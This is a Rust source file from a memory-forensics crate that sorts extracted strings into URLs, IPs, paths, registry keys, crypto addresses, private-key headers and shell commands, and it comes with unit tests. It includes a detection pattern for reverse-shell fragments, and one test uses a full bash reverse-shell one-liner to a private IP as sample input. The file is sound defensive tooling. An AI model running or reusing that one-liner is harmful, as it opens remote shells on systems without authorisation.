memf-strings 0.2.1

String extraction, classification, and YARA-X scanning for memory forensics
Documentation
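//! Regex-based string classifier for URLs, IP addresses, emails, filesystem
//! paths, registry keys, cryptocurrency addresses, credentials (PEM private
//! keys), Base64 blobs, and shell commands.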

use crate::classify::StringClassifier;
use crate::StringCategory;
use regex::Regex;
use std::sync::OnceLock;

/// One compiled row of the classification table: a regex together with the
/// category and confidence reported when that regex matches an input.
struct PatternEntry {
    /// Compiled pattern tested against each input string.
    regex: Regex,
    /// Category reported when `regex` matches.
    category: StringCategory,
    /// Confidence score reported alongside `category`.
    confidence: f32,
}

/// Static (pattern, category, confidence) classification table.
///
/// Patterns are compile-time-constant and known-valid; building the live
/// `PatternEntry` table filters out any that fail to compile (defence in
/// depth) rather than panicking, so a future bad edit degrades to a missing
/// category instead of an abort.
///
/// Most patterns are anchored with `^…$` and therefore must match the whole
/// input; the registry-key pattern is a prefix match, and the private-key and
/// shell-command patterns match anywhere in the input.
///
/// Digit classes are spelled `[0-9]` rather than `\d` where only ASCII digits
/// are valid, because `\d` is Unicode-aware in the `regex` crate.
const PATTERN_SPECS: &[(&str, StringCategory, f32)] = &[
    // http:// or https:// URL; stops at whitespace and common delimiter characters.
    (
        "(?i)^https?://[^\\s<>\"'{}|\\\\^`\\[\\]]+$",
        StringCategory::Url,
        0.90,
    ),
    // Dotted-quad IPv4: four octets in 0-255, ASCII digits only, no leading zeros.
    (
        r"^(?:(?:25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])\.){3}(?:25[0-5]|2[0-4][0-9]|1[0-9][0-9]|[1-9][0-9]|[0-9])$",
        StringCategory::IpV4,
        0.95,
    ),
    // IPv6: full 8-group, compressed (::), loopback (::1), etc.
    // Covers RFC 5952 canonical forms without interface ID suffixes.
    (
        concat!(
            r"^(?:[0-9a-fA-F]{1,4}:){7}[0-9a-fA-F]{1,4}$",
            r"|^(?:[0-9a-fA-F]{1,4}:){1,7}:$",
            r"|^::(?:[0-9a-fA-F]{1,4}:){0,6}[0-9a-fA-F]{1,4}$",
            r"|^::$",
            r"|^(?:[0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}$",
            r"|^(?:[0-9a-fA-F]{1,4}:){1,5}(?::[0-9a-fA-F]{1,4}){1,2}$",
            r"|^(?:[0-9a-fA-F]{1,4}:){1,4}(?::[0-9a-fA-F]{1,4}){1,3}$",
            r"|^(?:[0-9a-fA-F]{1,4}:){1,3}(?::[0-9a-fA-F]{1,4}){1,4}$",
            r"|^(?:[0-9a-fA-F]{1,4}:){1,2}(?::[0-9a-fA-F]{1,4}){1,5}$",
            r"|^[0-9a-fA-F]{1,4}:(?::[0-9a-fA-F]{1,4}){1,6}$",
        ),
        StringCategory::IpV6,
        0.95,
    ),
    // local-part@domain.tld with an alphabetic TLD of at least two letters.
    (
        r"^[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}$",
        StringCategory::Email,
        0.90,
    ),
    // Absolute Unix path rooted at one of a fixed set of top-level directories.
    (
        r"^/(?:usr|etc|var|tmp|home|opt|dev|proc|sys|root|bin|sbin|lib|mnt|run|srv)/[^\s:*?<>|]+$",
        StringCategory::UnixPath,
        0.85,
    ),
    // Drive-letter Windows path (`C:\...`) with backslash-separated components.
    (
        r"(?i)^[A-Z]:\\(?:[^\\/:*?<>|\r\n]+\\)*[^\\/:*?<>|\r\n]*$",
        StringCategory::WindowsPath,
        0.85,
    ),
    // Registry key prefix: a long hive name (HKEY_*) or its abbreviation
    // (HKLM, HKCU, HKCR, HKU, HKCC) followed by a backslash. Only the prefix is
    // checked, so anything may follow the first backslash.
    (
        r"(?i)^HK(?:EY_(?:LOCAL_MACHINE|CURRENT_USER|CLASSES_ROOT|USERS|CURRENT_CONFIG)|LM|CU|CR|U|CC)\\",
        StringCategory::RegistryKey,
        0.95,
    ),
    // Bitcoin legacy address: leading 1 or 3 followed by Base58 characters.
    (
        r"^[13][a-km-zA-HJ-NP-Z1-9]{25,34}$",
        StringCategory::CryptoAddress,
        0.70,
    ),
    // Ethereum-style address: 0x followed by exactly 40 hex digits.
    (r"^0x[0-9a-fA-F]{40}$", StringCategory::CryptoAddress, 0.80),
    // Bitcoin bech32 address. The upper bound of 59 characters after `bc1`
    // admits 62-character addresses (P2WSH, P2TR) as well as the 42-character
    // P2WPKH form.
    (
        r"^bc1[a-zA-HJ-NP-Z0-9]{25,59}$",
        StringCategory::CryptoAddress,
        0.85,
    ),
    // PEM private-key header, matched anywhere in the input. Covers the bare
    // PKCS#8 label, its ENCRYPTED variant, and the RSA/EC/OPENSSH/DSA labels.
    (
        r"-----BEGIN (?:RSA |EC |OPENSSH |DSA |ENCRYPTED )?PRIVATE KEY-----",
        StringCategory::PrivateKey,
        0.99,
    ),
    // Run of 20+ Base64-alphabet characters with up to two `=` of padding.
    // Any long alphanumeric token also satisfies this pattern.
    (
        r"^[A-Za-z0-9+/]{20,}={0,2}$",
        StringCategory::Base64Blob,
        0.40,
    ),
    // Fragments commonly seen in reverse-shell one-liners, matched anywhere in
    // the input.
    (
        r"/dev/tcp/|/dev/udp/|pty\.spawn|os\.dup2\(|bash\s+-i\s+>&",
        StringCategory::ShellCommand,
        0.90,
    ),
];

/// Returns the process-wide table of compiled classification patterns.
///
/// The table is built from `PATTERN_SPECS` on first call and cached in a
/// `OnceLock` afterwards. A spec whose pattern is rejected by `Regex::new` is
/// left out of the table instead of causing a panic.
fn patterns() -> &'static [PatternEntry] {
    static COMPILED: OnceLock<Vec<PatternEntry>> = OnceLock::new();
    COMPILED.get_or_init(|| {
        let mut table = Vec::new();
        for (source, category, confidence) in PATTERN_SPECS {
            // Skip (rather than abort on) anything the regex engine rejects.
            if let Ok(regex) = Regex::new(source) {
                table.push(PatternEntry {
                    regex,
                    category: category.clone(),
                    confidence: *confidence,
                });
            }
        }
        table
    })
}

/// A classifier that uses compiled regexes to categorize strings.
///
/// The type itself carries no state: the compiled patterns live in a shared
/// table that is built lazily on first use and then reused.
pub struct RegexClassifier;

impl StringClassifier for RegexClassifier {
    /// Identifier under which this classifier reports itself.
    fn name(&self) -> &str {
        "regex"
    }

    /// Tests `input` against every compiled pattern and returns the
    /// `(category, confidence)` pair of each pattern that matches, in table
    /// order.
    ///
    /// The result is empty when nothing matches, and may hold several entries
    /// when more than one pattern accepts the same input.
    fn classify(&self, input: &str) -> Vec<(StringCategory, f32)> {
        patterns()
            .iter()
            .filter(|entry| entry.regex.is_match(input))
            .map(|entry| (entry.category.clone(), entry.confidence))
            .collect()
    }
}

// Submits a `RegexClassifier` to the `inventory` registry as a
// `&'static dyn StringClassifier`. Presumably the crate gathers registered
// classifiers elsewhere via `inventory::collect!` / `inventory::iter` — confirm.
inventory::submit!(&RegexClassifier as &'static dyn StringClassifier);

#[cfg(test)]
mod tests {
    use super::*;

    /// Runs `RegexClassifier` over `input` and returns the raw results.
    fn classify(input: &str) -> Vec<(StringCategory, f32)> {
        RegexClassifier.classify(input)
    }

    /// Reports whether classifying `input` yields `wanted` at least once.
    fn yields(input: &str, wanted: StringCategory) -> bool {
        classify(input)
            .into_iter()
            .any(|(found, _)| found == wanted)
    }

    #[test]
    fn classifies_url() {
        assert!(yields("https://evil.com/payload.exe", StringCategory::Url));
    }

    #[test]
    fn classifies_ipv4() {
        assert!(yields("192.168.1.1", StringCategory::IpV4));
    }

    #[test]
    fn classifies_email() {
        assert!(yields("user@example.com", StringCategory::Email));
    }

    #[test]
    fn classifies_unix_path() {
        assert!(yields("/etc/passwd", StringCategory::UnixPath));
    }

    #[test]
    fn classifies_windows_path() {
        assert!(yields(
            "C:\\Windows\\System32\\cmd.exe",
            StringCategory::WindowsPath
        ));
    }

    #[test]
    fn classifies_registry_key() {
        assert!(yields(
            "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft",
            StringCategory::RegistryKey
        ));
    }

    #[test]
    fn classifies_ethereum_address() {
        assert!(yields(
            "0x742d35Cc6634C0532925a3b844Bc9e7595f2bD28",
            StringCategory::CryptoAddress
        ));
    }

    #[test]
    fn classifies_pem_private_key() {
        assert!(yields(
            "-----BEGIN RSA PRIVATE KEY-----",
            StringCategory::PrivateKey
        ));
    }

    #[test]
    fn classifies_shell_command() {
        assert!(yields(
            "bash -i >& /dev/tcp/10.0.0.1/4444 0>&1",
            StringCategory::ShellCommand
        ));
    }

    #[test]
    fn no_match_for_garbage() {
        // A short lowercase token should not trip any pattern at all.
        assert!(classify("xyzq").is_empty());
    }

    #[test]
    fn classifies_btc_legacy_address() {
        // Legacy Bitcoin addresses begin with 1 or 3.
        assert!(yields(
            "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa",
            StringCategory::CryptoAddress
        ));
    }

    #[test]
    fn classifies_btc_bech32_address() {
        // Bech32 Bitcoin addresses begin with bc1.
        assert!(yields(
            "bc1qw508d6qejxtdg4y5r3zarvary0c5xw7kv8f3t4",
            StringCategory::CryptoAddress
        ));
    }

    #[test]
    fn classifies_base64_blob() {
        assert!(yields(
            "SGVsbG8gV29ybGQhIFRoaXMgaXMgYSBiYXNlNjQgdGVzdA==",
            StringCategory::Base64Blob
        ));
    }

    #[test]
    fn classifier_name() {
        assert_eq!(RegexClassifier.name(), "regex");
    }

    #[test]
    fn classifies_http_url() {
        assert!(yields("http://example.com/page", StringCategory::Url));
    }

    #[test]
    fn classifies_private_key_variants() {
        // Unlabelled, EC, and OpenSSH headers, checked in that order.
        assert!(yields(
            "-----BEGIN PRIVATE KEY-----",
            StringCategory::PrivateKey
        ));
        assert!(yields(
            "-----BEGIN EC PRIVATE KEY-----",
            StringCategory::PrivateKey
        ));
        assert!(yields(
            "-----BEGIN OPENSSH PRIVATE KEY-----",
            StringCategory::PrivateKey
        ));
    }

    #[test]
    fn classifies_ipv6_full() {
        // All eight groups written out.
        assert!(
            yields(
                "2001:0db8:85a3:0000:0000:8a2e:0370:7334",
                StringCategory::IpV6
            ),
            "expected IpV6 classification for a full IPv6 address"
        );
    }

    #[test]
    fn classifies_ipv6_compressed() {
        // Loopback in `::` compressed notation.
        assert!(
            yields("::1", StringCategory::IpV6),
            "expected IpV6 classification for loopback ::1"
        );
    }

    #[test]
    fn classifies_ipv6_mixed_notation() {
        // Link-local address carrying a zone/interface suffix ("%eth0"). It is
        // classified but deliberately not asserted on: whether it matches
        // depends on whether the pattern accepts interface IDs.
        let _ = classify("fe80::1%eth0");
        // The same address without the suffix is required to match.
        assert!(
            yields("fe80::1", StringCategory::IpV6),
            "expected IpV6 classification for fe80::1 link-local"
        );
    }
}